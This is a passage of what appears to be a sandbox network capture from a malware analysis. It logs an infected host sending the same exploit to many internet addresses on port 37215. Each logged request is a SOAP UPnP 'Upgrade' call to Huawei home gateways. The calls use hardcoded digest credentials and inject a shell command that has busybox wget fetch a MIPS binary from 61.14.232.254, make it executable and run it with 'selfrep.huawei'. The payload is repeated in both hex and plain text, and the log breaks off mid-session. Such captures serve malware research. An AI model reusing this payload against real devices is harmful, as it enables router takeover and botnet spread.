6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  875192.168.2.1357258223.164.239.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.438379049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  876192.168.2.1335032218.130.117.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.438520908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  877192.168.2.1360558182.11.41.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.438544989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  878192.168.2.134834261.228.252.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.438610077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  879192.168.2.1340304197.216.231.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.438631058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  880192.168.2.1345118157.100.64.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.438642025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  881192.168.2.135158041.20.235.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.438749075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  882192.168.2.1348570157.59.203.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.438900948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  883192.168.2.133813441.15.135.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.439621925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  884192.168.2.1343218157.3.117.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.439657927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  885192.168.2.1354328157.162.146.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.440121889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
